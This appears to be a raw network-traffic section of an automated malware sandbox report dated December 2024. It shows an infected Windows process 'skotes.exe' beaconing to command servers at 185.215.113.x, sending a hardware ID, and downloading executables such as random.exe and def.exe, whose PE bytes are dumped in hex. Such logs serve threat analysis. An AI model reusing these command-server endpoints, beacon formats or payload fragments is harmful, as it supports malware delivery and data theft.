                                                                                                                                                                                                                                                          Data Ascii: t:gOf#6NF3tCaIDaSW)eG1UQnpb2B}v6te#&}>y1g8p/Sz}zF:eX~E|)V1pTN8?Fvez*%6K!5K


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                          129192.168.2.450213185.215.113.20680
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          Dec 19, 2024 14:26:56.981473923 CET90OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                          Host: 185.215.113.206
                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                          Dec 19, 2024 14:26:58.340645075 CET203INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 13:26:58 GMT
                                                                                                                                                                                                                                                          Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                          Content-Length: 0
                                                                                                                                                                                                                                                          Keep-Alive: timeout=5, max=100
                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                          Dec 19, 2024 14:26:58.346915007 CET413OUTPOST /c4becf79229cb002.php HTTP/1.1
                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----FIIIIJKFCAAECAKFIEHC
                                                                                                                                                                                                                                                          Host: 185.215.113.206
                                                                                                                                                                                                                                                          Content-Length: 211
                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                          Data Raw: 2d 2d 2d 2d 2d 2d 46 49 49 49 49 4a 4b 46 43 41 41 45 43 41 4b 46 49 45 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 31 46 30 33 43 33 42 42 32 33 38 31 38 30 36 39 37 30 37 35 32 0d 0a 2d 2d 2d 2d 2d 2d 46 49 49 49 49 4a 4b 46 43 41 41 45 43 41 4b 46 49 45 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 74 6f 6b 0d 0a 2d 2d 2d 2d 2d 2d 46 49 49 49 49 4a 4b 46 43 41 41 45 43 41 4b 46 49 45 48 43 2d 2d 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: ------FIIIIJKFCAAECAKFIEHCContent-Disposition: form-data; name="hwid"C1F03C3BB2381806970752------FIIIIJKFCAAECAKFIEHCContent-Disposition: form-data; name="build"stok------FIIIIJKFCAAECAKFIEHC--
                                                                                                                                                                                                                                                          Dec 19, 2024 14:26:58.790311098 CET210INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 13:26:58 GMT
                                                                                                                                                                                                                                                          Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                          Content-Length: 8
                                                                                                                                                                                                                                                          Keep-Alive: timeout=5, max=99
                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                          Data Raw: 59 6d 78 76 59 32 73 3d
                                                                                                                                                                                                                                                          Data Ascii: YmxvY2s=


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          130192.168.2.450214185.215.113.43806416C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          Dec 19, 2024 14:26:58.306155920 CET184OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                          Host: 185.215.113.43
                                                                                                                                                                                                                                                          Content-Length: 31
                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                          Data Raw: 64 31 3d 31 30 31 37 36 33 32 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
                                                                                                                                                                                                                                                          Data Ascii: d1=1017632001&unit=246122658369
                                                                                                                                                                                                                                                          Dec 19, 2024 14:26:59.652321100 CET193INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 13:26:59 GMT
                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                          Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: 4 <c>0


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          131192.168.2.450216185.215.113.43806416C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          Dec 19, 2024 14:27:01.522252083 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                          Host: 185.215.113.43
                                                                                                                                                                                                                                                          Content-Length: 4
                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                          Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                          Data Ascii: st=s
                                                                                                                                                                                                                                                          Dec 19, 2024 14:27:02.862637997 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 13:27:02 GMT
                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                          Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: 1 0


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          132192.168.2.450220185.215.113.43806416C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          Dec 19, 2024 14:27:04.494541883 CET308OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                          Host: 185.215.113.43
                                                                                                                                                                                                                                                          Content-Length: 154
                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                          Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 41 32 44 37 35 42 34 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                                                                                                                                                                                          Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77BA2D75B45E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                                                                                                                                                                                          Dec 19, 2024 14:27:05.866075039 CET375INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 13:27:05 GMT
                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                          Data Raw: 62 39 0d 0a 20 3c 63 3e 31 30 31 37 36 33 33 30 30 31 2b 2b 2b 66 63 38 66 37 63 31 65 64 33 63 30 66 39 63 33 30 62 34 62 61 65 64 37 34 63 36 31 33 39 35 64 37 66 61 63 30 30 62 35 38 39 38 37 65 38 66 63 66 37 62 38 63 37 33 30 38 30 34 30 34 32 62 61 35 63 65 39 30 32 34 31 35 34 35 30 23 31 30 31 37 36 33 34 30 30 31 2b 2b 2b 66 63 38 66 37 63 31 65 64 33 63 30 66 39 63 33 30 62 34 62 61 65 64 37 34 63 36 31 33 39 35 64 37 66 61 63 30 30 62 35 38 39 38 37 65 38 65 34 66 34 62 32 38 34 36 64 39 33 34 66 34 38 62 31 35 65 61 61 34 39 35 63 34 39 23 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: b9 <c>1017633001+++fc8f7c1ed3c0f9c30b4baed74c61395d7fac00b58987e8fcf7b8c730804042ba5ce902415450#1017634001+++fc8f7c1ed3c0f9c30b4baed74c61395d7fac00b58987e8e4f4b2846d934f48b15eaa495c49#<d>0


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          133192.168.2.450221185.215.113.16806416C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          Dec 19, 2024 14:27:05.990732908 CET55OUTGET /well/random.exe HTTP/1.1
                                                                                                                                                                                                                                                          Host: 185.215.113.16
                                                                                                                                                                                                                                                          Dec 19, 2024 14:27:07.331831932 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 13:27:06 GMT
                                                                                                                                                                                                                                                          Content-Type: application/octet-stream
                                                                                                                                                                                                                                                          Content-Length: 971264
                                                                                                                                                                                                                                                          Last-Modified: Thu, 19 Dec 2024 12:37:20 GMT
                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                          ETag: "67641380-ed200"
                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                          Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 9a c7 83 ae de a6 ed fd de a6 ed fd de a6 ed fd 6a 3a 1c fd fd a6 ed fd 6a 3a 1e fd 43 a6 ed fd 6a 3a 1f fd fd a6 ed fd 40 06 2a fd df a6 ed fd 8c ce e8 fc f3 a6 ed fd 8c ce e9 fc cc a6 ed fd 8c ce ee fc cb a6 ed fd d7 de 6e fd d7 a6 ed fd d7 de 7e fd fb a6 ed fd de a6 ec fd f7 a4 ed fd 7b cf e3 fc 8e a6 ed fd 7b cf ee fc df a6 ed fd 7b cf 12 fd df a6 ed fd de a6 7a fd df a6 ed fd 7b cf ef fc df a6 ed fd 52 69 63 68 de a6 ed fd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 71 13 64 67 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0e 10 00 ac 09 00 00 22 05 00 00 00 00 00 77 05 02 00 00 10 00 00 00 c0 [TRUNCATED]
                                                                                                                                                                                                                                                          Data Ascii: MZ@ !L!This program cannot be run in DOS mode.$j:j:Cj:@*n~{{{z{RichPELqdg""w@0@@@d|@gu4@.text `.rdata@@.datalpH@.rsrcg@h@@.relocuv\@B
                                                                                                                                                                                                                                                          Dec 19, 2024 14:27:07.331908941 CET224INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b9 74 0a 4d 00 e8 38 fd 01 00 68 e9 23 44 00 e8 8f f0 01 00 59 c3 68 f3 23 44 00
                                                                                                                                                                                                                                                          Data Ascii: tM8h#DYh#DYh#DrYY<h#DaYQh$DOY0MQ@0MP#h$D/Y%h$DYh!$DYA2h&$DY
                                                                                                                                                                                                                                                          Dec 19, 2024 14:27:07.331942081 CET1236INData Raw: e8 50 c1 01 00 68 30 24 44 00 e8 eb ef 01 00 59 c3 b9 04 25 4d 00 e8 9d 98 00 00 68 3f 24 44 00 e8 d5 ef 01 00 59 c3 56 8b f1 8d 4e 18 e8 b4 87 00 00 8d 4e 08 e8 ac 87 00 00 6a 28 56 e8 e2 ec 01 00 59 59 8b c6 5e c2 04 00 55 8b ec 83 ec 38 c7 05
                                                                                                                                                                                                                                                          Data Ascii: Ph0$DY%Mh?$DYVNNj(VYY^U80MtI3M0IMMVQfMo0M@0M\I0MH,M3MMMMYMMM3MTMXM\
                                                                                                                                                                                                                                                          Dec 19, 2024 14:27:07.332086086 CET1236INData Raw: 8b ce c7 06 44 c9 49 00 e8 74 02 00 00 ff 76 04 e8 82 e8 01 00 8b f3 c7 87 4c fd ff ff 40 c9 49 00 59 39 9f 54 fd ff ff 0f 87 f2 0f 04 00 ff b7 50 fd ff ff 89 9f 54 fd ff ff e8 58 e8 01 00 8b f3 c7 87 3c fd ff ff 40 c9 49 00 59 39 9f 44 fd ff ff
                                                                                                                                                                                                                                                          Data Ascii: DItvL@IY9TPTX<@IY9D@D.,@IY9404Y$<IvY-
                                                                                                                                                                                                                                                          Dec 19, 2024 14:27:07.332122087 CET1236INData Raw: 64 00 00 00 33 c9 66 a3 32 15 4d 00 41 a2 34 15 4d 00 6a 0a 89 0d 38 15 4d 00 89 0d 3c 15 4d 00 89 0d 40 15 4d 00 a2 50 15 4d 00 66 a3 fc 16 4d 00 89 0d f4 16 4d 00 89 0d f8 16 4d 00 b9 fa 00 00 00 58 89 0d 14 17 4d 00 a3 44 15 4d 00 a3 48 15 4d
                                                                                                                                                                                                                                                          Data Ascii: d3f2MA4Mj8M<M@MPMfMMMXMDMHMLMUWrVj@YuON8w^_]UVuWVgFO GFGFGF aPF0G0_^]33@AQQQQA,Q
                                                                                                                                                                                                                                                          Dec 19, 2024 14:27:07.332160950 CET272INData Raw: 8b 4f 04 8b 45 f8 8b 04 81 66 83 78 08 7f 0f 85 33 08 04 00 80 7d ff 00 8d 8e 64 01 00 00 75 1e 80 be 6d 01 00 00 00 8b 8e 68 01 00 00 75 16 8b 49 04 8b 45 0c 41 89 08 5f 5e c9 c2 08 00 e8 de 08 00 00 eb f3 8b 49 30 eb e5 55 8b ec 83 ec 18 83 65
                                                                                                                                                                                                                                                          Data Ascii: OEfx3}dumhuIEA_^I0UeEeVEVPuuxMM3M^At)ttH9AxUSVu3WyQ>t
                                                                                                                                                                                                                                                          Dec 19, 2024 14:27:07.332442045 CET1236INData Raw: 5f 5e 33 c0 5b 5d c2 04 00 b2 01 eb ed 55 8b ec 83 ec 1c 33 d2 42 53 56 57 8b c2 50 8d 50 01 89 55 fc e8 55 07 00 00 8b f8 85 ff 0f 84 c3 00 00 00 8d 4a ff 89 0d 28 15 4d 00 8b 4f 04 8b 31 66 83 7e 08 00 75 d3 8b 36 83 fe 20 74 05 83 fe 2b 75 c7
                                                                                                                                                                                                                                                          Data Ascii: _^3[]U3BSVWPPUUJ(MO1f~u6 t+u+3+fy4AEAEARUE{lMG3+DfxGuBAEESPEPEPWDMnwU%
                                                                                                                                                                                                                                                          Dec 19, 2024 14:27:07.332479000 CET1236INData Raw: 8b 5d fc ff 75 f4 8b 45 f8 ff 75 e4 ff 75 e0 53 50 ff 75 f0 57 e8 0f 04 00 00 85 c0 0f 89 08 ff ff ff e9 82 00 00 00 8b 41 04 6a 7f 59 66 39 48 08 0f 85 c7 04 04 00 8b 45 f4 48 4f 83 bd 54 ff ff ff 00 89 45 f4 0f 84 9e 02 04 00 80 bd 5d ff ff ff
                                                                                                                                                                                                                                                          Data Ascii: ]uEuuSPuWAjYf9HEHOTE]ETpXEE;1uuuuSRu3SxMxl`MTM_^[
                                                                                                                                                                                                                                                          Dec 19, 2024 14:27:07.332511902 CET1236INData Raw: 7c ef 53 8d 41 ff 32 db 33 ff 85 c0 7e 2c 8b 46 08 8b 0c b8 8b d1 8b 44 b8 04 89 4d f4 8b c8 89 45 f8 e8 dc a9 01 00 84 c0 75 13 8b 4e 0c 47 8d 41 ff 3b f8 7c d8 84 db 75 c9 5b 5f eb 8c 8b 46 08 b3 01 8b 4d f8 89 0c b8 8b 46 08 8b 4d f4 89 4c b8
                                                                                                                                                                                                                                                          Data Ascii: |SA23~,FDMEuNGA;|u[_FMFMLU,SVWL$(D$83Ph\$\$(ID$PuIM3#MG;D$PQhMhM,#MM#MD
                                                                                                                                                                                                                                                          Dec 19, 2024 14:27:07.332546949 CET1236INData Raw: 4d e0 e8 d7 69 00 00 56 b9 f0 13 4d 00 e8 04 7a 00 00 8d 45 94 50 8d 4d c0 e8 b9 40 00 00 68 84 ca 49 00 8d 4d e0 e8 d7 6d 00 00 53 6a 01 8d 45 c0 50 8d 45 e0 50 e8 2f 79 00 00 8d 4d e0 e8 9b 69 00 00 68 74 ca 49 00 8d 4d d0 c7 45 e0 00 01 00 00
                                                                                                                                                                                                                                                          Data Ascii: MiVMzEPM@hIMmSjEPEP/yMihtIME]EmSSEPEPxMEciMluM"zEPM9}WhXIYYWh0IYYWhIYYWhIYYu>M
                                                                                                                                                                                                                                                          Dec 19, 2024 14:27:07.451616049 CET1236INData Raw: 05 33 c9 66 89 08 8d 8d fc ff fe ff e8 11 00 00 00 8d 85 fc ff fe ff 8b ce 50 e8 b3 37 00 00 5e c9 c3 56 8b f1 56 e8 b3 15 02 00 59 85 c0 74 0f 66 83 7c 46 fe 5c 75 07 33 c9 66 89 4c 46 fe 5e c3 55 8b ec 56 57 8b f9 33 f6 46 8b 4f 0c 8b 01 3b c6
                                                                                                                                                                                                                                                          Data Ascii: 3fP7^VVYtf|F\u3fLF^UVW3FO;Qu_^]USVWueYN3C;FPiq?PFuCP~3N_fH^[]U<EL$S3#MV4If#M


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                          134192.168.2.450225185.215.113.1680
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          Dec 19, 2024 14:27:08.424942970 CET200OUTGET /off/def.exe HTTP/1.1
                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                          Host: 185.215.113.16
                                                                                                                                                                                                                                                          Dec 19, 2024 14:27:09.766016960 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 13:27:08 GMT
                                                                                                                                                                                                                                                          Content-Type: application/octet-stream
                                                                                                                                                                                                                                                          Content-Length: 1738752
                                                                                                                                                                                                                                                          Last-Modified: Thu, 19 Dec 2024 12:37:48 GMT
                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                          ETag: "6764139c-1a8800"
                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                          Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 20 45 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 60 45 00 00 04 00 00 4c 05 1b 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 44 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                                                                                                                                                                                                          Data Ascii: MZ@z!L!This program cannot be run in DOS mode.$PELP(,e"0$ E `@ `EL`Ui`D @ @.rsrcD`2@.idata 6@ *8@qpxzdhbb@*(:@imlhbikp Eb@.taggant@ E"f@
                                                                                                                                                                                                                                                          Dec 19, 2024 14:27:09.766108990 CET124INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                          Data Ascii:
                                                                                                                                                                                                                                                          Dec 19, 2024 14:27:09.766127110 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                          Data Ascii:
                                                                                                                                                                                                                                                          Dec 19, 2024 14:27:09.766211033 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                          Data Ascii:
                                                                                                                                                                                                                                                          Dec 19, 2024 14:27:09.766398907 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                          Data Ascii:
                                                                                                                                                                                                                                                          Dec 19, 2024 14:27:09.766412973 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                          Data Ascii:
                                                                                                                                                                                                                                                          Dec 19, 2024 14:27:09.766438007 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                          Data Ascii:
                                                                                                                                                                                                                                                          Dec 19, 2024 14:27:09.766452074 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                          Data Ascii:
                                                                                                                                                                                                                                                          Dec 19, 2024 14:27:09.767026901 CET1236INData Raw: 51 03 97 36 ba 1a 36 db 7f 0e de 77 23 f1 0e 57 e4 9f f4 73 6b eb fd c8 fa 1b fb a9 9d 3a d9 fd 7c 31 13 3c 86 ef cc 57 f5 84 8c af c9 70 7b 2b e5 f3 32 c6 c2 fd 10 d2 cd 38 30 b4 e8 f8 2b 17 48 91 f0 ff 1d 16 25 b5 ec b7 71 a1 c3 ef 3f 0d 5e 02
                                                                                                                                                                                                                                                          Data Ascii: Q66w#Wsk:|1<Wp{+280+H%q?^(h [a2ps=RQ(=.64yL.qjB/"4 3q3()N"!' ItVq&SAA\N5nzARF
                                                                                                                                                                                                                                                          Dec 19, 2024 14:27:09.767040968 CET1236INData Raw: ac 26 99 a1 05 5e d5 ff 12 d2 d5 4e 6b 23 fd 57 e5 70 cd c4 29 7a c5 94 d4 12 bd b1 00 73 0f c2 c6 16 56 41 cc fa b1 cd 6b 26 e8 ba c2 98 5d a5 7f a1 e8 aa dc ad 2d 93 7c 29 03 03 4b 06 8d bc 1d fb 21 f2 f2 49 8e bd 83 f2 97 0c 8c 7a 6b 38 93 7e
                                                                                                                                                                                                                                                          Data Ascii: &^Nk#Wp)zsVAk&]-|)K!Izk8~sht>:?K&V1C)y01nbq )!*T4g3M>Dbu\]5nL!w0e,T0wOQ^QC
                                                                                                                                                                                                                                                          Dec 19, 2024 14:27:09.885867119 CET1236INData Raw: 53 0b 09 ea 99 71 6a e8 c6 20 bd 01 85 28 e4 ba 8c b2 58 f8 ec 08 79 8e 74 25 23 1d 72 dd 32 18 1e 08 9f c5 c4 08 2a 57 9e db 1d ec 85 06 06 90 2c b0 95 ea 99 82 30 a6 5f 4c d7 b6 fe c7 7c 5b 3e fb 66 3f 8e 33 c6 a4 2e 55 0f 0d 5b 34 e6 74 ea 83
                                                                                                                                                                                                                                                          Data Ascii: Sqj (Xyt%#r2*W,0_L|[>f?3.U[4t1a#<{[*)Kw-?NQH{7pKc0*Yl7z~;)9FJ$9+}OHyr8"%~eG5\k)<b}iyT[CR8
                                                                                                                                                                                                                                                          Dec 19, 2024 14:27:12.934381008 CET205OUTGET /steam/random.exe HTTP/1.1
                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                          Host: 185.215.113.16
                                                                                                                                                                                                                                                          Dec 19, 2024 14:27:13.376617908 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 13:27:12 GMT
                                                                                                                                                                                                                                                          Content-Type: application/octet-stream
                                                                                                                                                                                                                                                          Content-Length: 2940416
                                                                                                                                                                                                                                                          Last-Modified: Thu, 19 Dec 2024 12:39:26 GMT
                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                          ETag: "676413fe-2cde00"
                                                                                                                                                                                                                                                          Accept-Ranges: bytes
